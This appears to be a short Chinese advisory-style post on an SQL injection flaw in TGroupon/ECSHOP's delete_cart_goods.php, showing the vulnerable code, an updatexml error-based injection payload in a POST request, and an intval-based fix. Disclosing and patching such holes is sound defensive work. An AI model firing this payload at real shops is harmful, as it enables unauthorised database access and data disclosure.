您好,登录后才能下订单哦!
密码登录
登录注册
点击 登录注册 即表示同意《亿速云用户服务条款》
TGroupon其实就是ECSHOP修改的。
漏洞文件:
delete_cart_goods.php
if($_POST['id']) { $sql = 'DELETE FROM '.$GLOBALS['ecs']->table('cart')." WHERE rec_id=".$_POST['id']; $GLOBALS['db']->query($sql); }
漏洞测试:
http://www.baidu.com/delete_cart_goods.php
POST:
id=1%20or%20updatexml(1,concat(0x7e,user(),0x7e),0)
修复:第一个 IF 代码语句
if($_POST['id']) { $sql = 'DELETE FROM '.$GLOBALS['ecs']->table('cart')." WHERE rec_id=".$_POST['id']; $GLOBALS['db']->query($sql); }
换成如下代码:
if($_POST['id']) { $id=intval($_POST['id']);//增加转换类型 By:i2ty,这样可以防止传入其他的东西进来 if($id==0){ exit;//当错误时退出。 }else{ $sql = 'DELETE FROM '.$GLOBALS['ecs']->table('cart')." WHERE rec_id=".$id; $GLOBALS['db']->query($sql); } }
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。